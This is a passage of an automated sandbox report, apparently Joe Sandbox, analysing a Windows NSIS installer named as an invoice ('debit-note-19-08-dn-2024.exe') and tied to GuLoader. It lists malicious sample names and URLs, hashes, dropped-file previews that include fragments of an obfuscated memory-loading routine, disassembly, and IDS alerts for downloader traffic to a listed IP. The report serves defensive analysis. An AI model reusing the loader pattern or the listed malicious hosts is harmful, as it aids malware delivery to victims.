            specifications.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.96.3
            https://ch3.dlvideosfre.click/kjnsdfsvfGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/22kjhsfdh67Get hashmaliciousUnknownBrowse
            • 104.18.3.35
            https://wetransfer.com/downloads/e3c914f2e6f4651b1445415756262fa620240826020905/640d590327db92754fa0159c45d4f92720240826020905/4529de?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousUnknownBrowse
            • 104.26.0.90
            http://in.eodcnetworkdirect.com/link?messageId=%3C1ffa719c-b87a-sl35-4bd8-91e3-06f513ec6e0e@eodcnetworkdirect.com%3E&url=//phsdobrasil.ind.br/events/Get hashmaliciousUnknownBrowse
            • 188.114.96.3
            SecuriteInfo.com.Win32.Evo-gen.18513.13360.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
            • 172.64.41.3
            https://pentaleon.com/?sragyzsragyzGet hashmaliciousUnknownBrowse
            • 104.21.22.213
            http://click.email.traininng.com/?qs=7e52e1e342fe8135e162991521b111fc8d4368e9710ce6f89c938f976c8b8a6e8dedd476ad120e7ccc9751e86cfbe363f8d3560eb970585def87511f7d5427caGet hashmaliciousUnknownBrowse
            • 104.18.70.113
            file.exeGet hashmaliciousUnknownBrowse
            • 172.64.41.3
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            37f463bf4616ecd445d4a1937da06e19ep_setup.exeGet hashmaliciousUnknownBrowse
            • 172.67.207.219
            nFLv1PupGS.dllGet hashmaliciousUnknownBrowse
            • 172.67.207.219
            nFLv1PupGS.dllGet hashmaliciousUnknownBrowse
            • 172.67.207.219
            file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, Stealc, VidarBrowse
            • 172.67.207.219
            file.exeGet hashmaliciousLummaC, VidarBrowse
            • 172.67.207.219
            FortiClientOnlineInstaller.exeGet hashmaliciousVidarBrowse
            • 172.67.207.219
            a.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 172.67.207.219
            Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 172.67.207.219
            file.exeGet hashmaliciousLummaC, VidarBrowse
            • 172.67.207.219
            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
            • 172.67.207.219
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dllHE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
              HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                  z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                    _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousGuLoaderBrowse
                        PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exeGet hashmaliciousGuLoaderBrowse
                          PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exeGet hashmaliciousGuLoaderBrowse
                            2024090533201.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):49
                              Entropy (8bit):4.75216571132969
                              Encrypted:false
                              SSDEEP:3:a6QLQIfLBJXlFGfv:xQkIPeH
                              MD5:797DA95245047A54F125FBF3B19FA295
                              SHA1:9E46F51C033836343C4099609F35B9B62C290A00
                              SHA-256:A047914D1DB23829E36D3A2A908D83F4B51F5A8194AE090BB9F9AB9F8DDA9128
                              SHA-512:4755C72A469C7C816D7B4A08BFEABFC266AAD029156A301E2592E3AFD16C5DB5FCE44C4475CB83C43B859A06AD069370182FCA5CAFACF4A27D191F4C0AE34A03
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:[Loading]..Start=user32::EnumWindows(i r2 ,i 0)..
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):11776
                              Entropy (8bit):5.656006343879828
                              Encrypted:false
                              SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                              MD5:3E6BF00B3AC976122F982AE2AADB1C51
                              SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                              SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                              SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                              • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                              • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                              • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                              • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                              • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                              • Filename: PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe, Detection: malicious, Browse
                              • Filename: PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe, Detection: malicious, Browse
                              • Filename: 2024090533201.exe, Detection: malicious, Browse
                              Reputation:moderate, very likely benign file
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):425059
                              Entropy (8bit):6.492264923451216
                              Encrypted:false
                              SSDEEP:6144:qRP7Sfw7mc55PPLrSwwPxUEf9BUWrTQAyCY4xZyL4i/yrlmh2suWOOufV5a:4P7IcLNwHUWnO4fyL4jrlmhbuXC
                              MD5:56074DE62B2FE4CCC5906532BF729C62
                              SHA1:352E7F71C32F6B974CEE9BE59DCBEA1257EB37BD
                              SHA-256:A7022A661A55C0679DF510D460786911EF9DCF090AB0E2BFDF2AEB5776DF1623
                              SHA-512:E84667D77854B3996F75FE36F5B49B2FE99AB487FC90F32D45C10A0CDBD432167858F954013EAD56ED23FA386B860E15DCBD205631B40E8872713356FC5B3F08
                              Malicious:false
                              Reputation:low
                              Preview:f.......,...................[...................f...........................................................................................................................................................................................................................................G...J...........e...j.........................................................................................................................................../...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):27
                              Entropy (8bit):4.134336113194451
                              Encrypted:false
                              SSDEEP:3:iGAeSMn:lAeZ
                              MD5:7AB6006A78C23C5DEC74C202B85A51A4
                              SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                              SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                              SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:[Access]..Setting=Enabled..
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13390
                              Entropy (8bit):4.527773348664665
                              Encrypted:false
                              SSDEEP:192:ZIh2g9y8px5TSdP6V5kT+kU3Dr9W2jEk+SlVUDVN:ah2gwQ5TSF6PktgDrQaHDK
                              MD5:2A2EBC2FA44FD1D75481C6CAAB1695E4
                              SHA1:5A59085A600674418CCFD1B81F6CB58A062D94A7
                              SHA-256:3A505BAA89729E166CF0173A702F15DC34592872BDF6A69105D4DC5677DE21CF
                              SHA-512:200377184F413650F690D424565B7DEE8DEDBB9E58CC84666BA027C5ABF1EBBC6B75BA8BE697F07F1514C1FEDAAB044A532B5BC93D81A9EDBA466F0E1CBE58CD
                              Malicious:false
                              Reputation:low
                              Preview:.....JJJ.........y.........WWW......................NN..>.??.@@........9.......22......Z...I...k...e...r..>n...e...l...3...2...:.**:...C...r...e...a...t.X.e..>F..Zi...l...e...A...(...m... ...r...4... ...,..$ ...i... ...0...x..F8...0...0...0...0...0..^0...0...,... ...i... ...0...,... ...p.OO ...0...,... ...i... ...4...,... ...i... ...0..9x.W.8..t0...,.GG ...i.s. ...0...)...i.......r...8...q...k.I.e...r...n...e.J.l...3...2...:.yy:..VS.3.e...t...F...i...l...e...P...o..[i...n...t...e...r...(...i... ...r...8...,... ..Vi... ...2...3...0...1...2... ...,... ...i... ...0..L,...i... ...0...)...i.......r...4...q...k...e..^r...n...e...l...3...2...:...:...V...i...r...t...u...a...l...A...l...l...o...c...(...i... ...0...,...i... ..{7...0...5...6...5..@8..*8...8...,... ...i..< ...0...x...3...0...0...0..s,... ...i..* ...0..Ox...4...0..=)...p.......r...2...q...k..ye...r...n...e...l...3...2...:...:...R.>.e...a...d...F.||i...l...e...(...i... .D.r...8.SS,... ...i... ...r...2...,... ...i... ...7...0...5...6
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):485
                              Entropy (8bit):4.232571417138926
                              Encrypted:false
                              SSDEEP:12:ZvQJDLIkJHTjbxleUuXCrM+loDMsjHoIIFVVUIgib:ZvQvzjlleUuXso9ZWVy6
                              MD5:3AF0252A9A2814A66060B5602FEFB22A
                              SHA1:C03E5A75AC4B95C5FC3631EA80E3182FBAD4F03B
                              SHA-256:2467A15368DFEDFB6156E0C02D2A958DBB18456051665A317CB7628E32FB046F
                              SHA-512:3E0CF8FB7D600FD0E228A24163A54F7820B8575AE2D49C048A0D16A923716AF7AD868C4951C09D2C941EABDF9E6EDA081C16A68338BCFDD46CC5A682EC82ED10
                              Malicious:false
                              Preview:tomandstelte haggling hunknsvsens faq indulgentness dermestid daabsfadene spillereglernes hngerv..aktieprotokols overenskomststridige moonwort exion dolkestdslegender.otomian steading thoracomelus spaltedefinitionernes paracelsist stikkel urkokkens disuses sunniest counterlighted spadeformede depreciative coset..snnekonens soundings karotiner dutte.scoparin unglittery bdestraffes land synkefrdig kadaya..tildragelsers fjerkrfarmenes trailerite differentialize plejeforldre concaves.
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):34424
                              Entropy (8bit):3.2127370751221456
                              Encrypted:false
                              SSDEEP:768:XeemGABJJ8rAL0xf2NDjhS8t5L/bKNEwLeRmQTid9:XeXfBJarAL0IlVSutjed9
                              MD5:357C239C8A128101281301765FAE888E
                              SHA1:C06BA64C77BA6E06E4AEF81076946E2E14475719
                              SHA-256:BDFD76CAC29B8F8C3852AE9332E26BAD07838999BC81F50A05CC9513A5DF661F
                              SHA-512:A2B185AF74AAAB903DC7B34FB7C9017D01FA44F0FDB903E3FB68EEE88F783AD5DC9D73731A37B181C911C036950BE193794105250BC277F9F7A38ED0DCDA81A5
                              Malicious:false
                              Preview:................z.-...............,..........s.....+.......@..,.......+n.$........f....H.........u..y..................t.......]...............$..........................|..............<'........n.........RD.......vk...................b.....g........+..........&t...8....&......6.$'...,.............v.0........................e...]./.........,...............................@..G.............../................................-....8.........l.............&S..e...............%.........[|.....A............j.....%............r..........l...........................:.....f7.................................[.......................M.............................g.....n...................h......................7...............1...D...............!....0....b.........!..}.......4......................H...........a......0......................rzG......$.....ty.[..8....t..........................ix[... ..#X~.....................Z_................ ............b.....W...Hq................9....2......
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):284395
                              Entropy (8bit):7.494018575020684
                              Encrypted:false
                              SSDEEP:6144:nfw7mc55PPLrSwwPxUEf9BUWrTQAyCY4xZyL4i/yrlmh2sr:fcLNwHUWnO4fyL4jrlmhbr
                              MD5:9CFDB6FACB7D10B9AA1C82CDBB445F33
                              SHA1:391C6DBE051F1ABD8B77D8627C9883E9392485AC
                              SHA-256:0171AB74E03848F6A071617FCC12849E3A61BD966A74A3C94796B7C8041BDA53
                              SHA-512:6C4DAB89FDEDDFB1DA2976EE33B7FE315763CC117351CEC59F0B2E0804B06EA543E0552DF5C2BC987D277B938F9B1DA42A857E63E2FC162CE84B47918C496A46
                              Malicious:false
                              Preview:.....vv......P.X......)))........ii............a......................S..........%%..........;;;;.......................................mmm...^^......"".p........j.........!....HH........XX.........FF..........e........ccccc......v......................bb..{.....[..............h..........n.........HH...............$$$$...............4....X.aa..................Q.@......22.........)................V.................888888....................................###...[[...'........................||.qq....ccc.................................555..........KKK.......=..<.^^..F............{{.^....U...................==.3........................666...".P..-.............%%%............{{{{{{{...11........T...............................................44444.....B...........ll.=.....................X.....................\.....0000..........f........K...hh...........SS.........;.E.N..........._.''..z....l.......T..!!.ww.......777.............A......................W.Q...../...........R.oo..K..NNN.0..
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 211-0, spot sensor temperature -2251799813685248.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
                              Category:dropped
                              Size (bytes):46432
                              Entropy (8bit):3.2136461621363517
                              Encrypted:false
                              SSDEEP:768:ASGyNzhlBd5sdPN1A1Qh0prboupWEK6zFx+UHd:n7lBd5QNw9ok/Fx39
                              MD5:AE7B67A58B022BEFCC6C3B1922A12AE3
                              SHA1:ADBF63E7714B4968A236C3BFDC6EBB1ED24DD996
                              SHA-256:6EE65A08717947BA0023F0ABC4E60A08E1A638C067D8DCC9CA7B0645859D916F
                              SHA-512:712018BDF5981A0601728BF4FC2A27971F13E0DAC6AA4774957B91D9631DBCF81B66B85D4216ABA34B243DBD0402FB7BFB11A92B3566278CA7DAC057C1A455CC
                              Malicious:false
                              Preview:......._h1....................Q.................Z........*..a.....!...........W8........%..w.................G........................7.......... .7......e..........................................s...'.....................................y............&i..................H........:...........`....d....%@S.|~....T.........<....4...................j..................................................E...N...e.....x.k...5X........................7.........O-.................................Y."...!.......-................o......4........n..d.................f......./........................7......V...>.....y...C......<.......-.......................4........................)..............................&.w........./.3..........n..u...;......Ad......E...~.....o...~..................................w.................c........."..........\......B..x.........|...>..B.............................0.....E......."...................rB.................................?.............*.......4.xP....
                              Process:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):26080
                              Entropy (8bit):3.20612396093193
                              Encrypted:false
                              SSDEEP:384:p7ctcY4i68lGFjVq4cPpf3NNMG63AzpZWoI64ICEaHFf8CXvRU:pgtgrsGFY4Q3DL63AzpZc+s00pU
                              MD5:6843BC02ED836FABDD0C402C93BD6070
                              SHA1:8CA940C30AAFD3E2B41A54A98E3359A7E70F6F01
                              SHA-256:E8500F97DC807D1A6FFA7D6EC3001C51281398B6BA21DFB66418D4D193E31FFB
                              SHA-512:8995001C1662F7D4BD43EBF2DA40AC17513419FC150901E45E14A72EEF58A032D1F70CAFFED893BEF0AB360968BD132472D2171B3C3C790D8796DAA4A34E2E59
                              Malicious:false
                              Preview:.........`...................'...2........... .#.................8.................x........&....=.......F...."..........x.+....0e.T..........................)........K........z.R..Y....Qr.......................+..........>.$.%....,..5................S....zg.....'.....$......+..D..................M........s........3.....................X...........F.......................D..........................v....3....E.....A....._...................................`............ ....i.....................Q.........._........................C.E...T................................N.....I{.......F......*..4....k................................................x....[......L........................*................#..xt.3......J..................................4....6................................^..R......_...........}..|....._......................8......./..............................................U...............G................u.2..........o.......&........+.........M..............;........
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):7.93777579175851
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:debit-note-19-08-dn-2024.exe
                              File size:330'962 bytes
                              MD5:5133f0baa9ab594674eae836fd1491c7
                              SHA1:389ab5a5e7ed520406265e0a1adc14d5ff478c4a
                              SHA256:e13fd3d42fb6c63fcf7780701282f760bd4aaa6ad1cdb55cc586e1aca8caaf2a
                              SHA512:0b1be90e58591907084f7262c60b0fb92de18bce2ad5e47aaa3592a9795a7c4d0fd4301c58427588361ac626cd19f59ba1c362b41765765e0b3d1e093fe427e3
                              SSDEEP:6144:XW+7+eMMKlVXkYuF6ECJ4D3aJ6SXfBBJEh3LO3Arcp:XRLKlVXREC2qJLX/JU3yz
                              TLSH:7B6412427ACBC13AFBC25A30DB66DE7AF2B6D604052603473F216FF52931286C569367
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@
                              Icon Hash:3d2e0f95332b3399
                              Entrypoint:0x40335a
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                              Instruction
                              sub esp, 000002D8h
                              push ebx
                              push ebp
                              push esi
                              push edi
                              push 00000020h
                              xor ebp, ebp
                              pop esi
                              mov dword ptr [esp+18h], ebp
                              mov dword ptr [esp+10h], 00409230h
                              mov dword ptr [esp+14h], ebp
                              call dword ptr [00407034h]
                              push 00008001h
                              call dword ptr [004070BCh]
                              push ebp
                              call dword ptr [004072ACh]
                              push 00000009h
                              mov dword ptr [004292B8h], eax
                              call 00007F6708B8881Ah
                              mov dword ptr [00429204h], eax
                              push ebp
                              lea eax, dword ptr [esp+38h]
                              push 000002B4h
                              push eax
                              push ebp
                              push 004206A8h
                              call dword ptr [0040717Ch]
                              push 0040937Ch
                              push 00428200h
                              call 00007F6708B88485h
                              call dword ptr [00407134h]
                              mov ebx, 00434000h
                              push eax
                              push ebx
                              call 00007F6708B88473h
                              push ebp
                              call dword ptr [0040710Ch]
                              push 00000022h
                              mov dword ptr [00429200h], eax
                              pop edi
                              mov eax, ebx
                              cmp word ptr [00434000h], di
                              jne 00007F6708B85909h
                              mov esi, edi
                              mov eax, 00434002h
                              push esi
                              push eax
                              call 00007F6708B87EC3h
                              push eax
                              call dword ptr [00407240h]
                              mov ecx, eax
                              mov dword ptr [esp+1Ch], ecx
                              jmp 00007F6708B859FBh
                              push 00000020h
                              pop edx
                              cmp ax, dx
                              jne 00007F6708B85909h
                              inc ecx
                              inc ecx
                              cmp word ptr [ecx], dx
                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000xb10.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x5ec60x600060ec0c4d80dd6821cdaced6135eddfd5False0.6593424479166666data6.438901783265187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x90000x202f80x60099cdd6cde9adee6bf3b24ee817b4574bFalse0.4830729166666667data3.8340327961758165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata0x2a0000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x4d0000xb100xc00254b81c9e7cdc6038a0abfd972e7779cFalse0.4134114583333333data4.250827316191816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x4d1c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                              RT_DIALOG0x4d4a80x100dataEnglishUnited States0.5234375
                              RT_DIALOG0x4d5a80x11cdataEnglishUnited States0.6056338028169014
                              RT_DIALOG0x4d6c80xc4dataEnglishUnited States0.5918367346938775
                              RT_DIALOG0x4d7900x60dataEnglishUnited States0.7291666666666666
                              RT_GROUP_ICON0x4d7f00x14dataEnglishUnited States1.2
                              RT_MANIFEST0x4d8080x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                              DLLImport
                              KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                              ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                              2024-08-26T15:35:12.874627+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249834443192.168.11.20172.67.207.219
                              2024-08-26T15:36:58.028571+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249844443192.168.11.20172.67.207.219
                              2024-08-26T15:38:22.106211+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249852443192.168.11.20172.67.207.219
                              2024-08-26T15:32:24.398809+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249818443192.168.11.20172.67.207.219
                              2024-08-26T15:34:20.207005+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249829443192.168.11.20172.67.207.219
                              2024-08-26T15:35:33.923133+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249836443192.168.11.20172.67.207.219
                              2024-08-26T15:35:44.422795+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249837443192.168.11.20172.67.207.219
                              2024-08-26T15:39:14.576936+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249857443192.168.11.20172.67.207.219
                              2024-08-26T15:35:23.403637+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249835443192.168.11.20172.67.207.219
                              2024-08-26T15:37:08.534612+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249845443192.168.11.20172.67.207.219
                              2024-08-26T15:38:01.116261+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249850443192.168.11.20172.67.207.219
                              2024-08-26T15:33:48.667089+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249826443192.168.11.20172.67.207.219
                              2024-08-26T15:38:32.606941+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249853443192.168.11.20172.67.207.219
                              2024-08-26T15:33:06.530531+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249822443192.168.11.20172.67.207.219
                              2024-08-26T15:38:11.609384+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249851443192.168.11.20172.67.207.219
                              2024-08-26T15:40:17.503268+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249863443192.168.11.20172.67.207.219
                              2024-08-26T15:33:59.198908+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249827443192.168.11.20172.67.207.219
                              2024-08-26T15:34:41.251146+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249831443192.168.11.20172.67.207.219
                              2024-08-26T15:34:51.795578+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249832443192.168.11.20172.67.207.219
                              2024-08-26T15:39:46.050297+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249860443192.168.11.20172.67.207.219
                              2024-08-26T15:35:54.951763+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249838443192.168.11.20172.67.207.219
                              2024-08-26T15:35:02.339615+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249833443192.168.11.20172.67.207.219
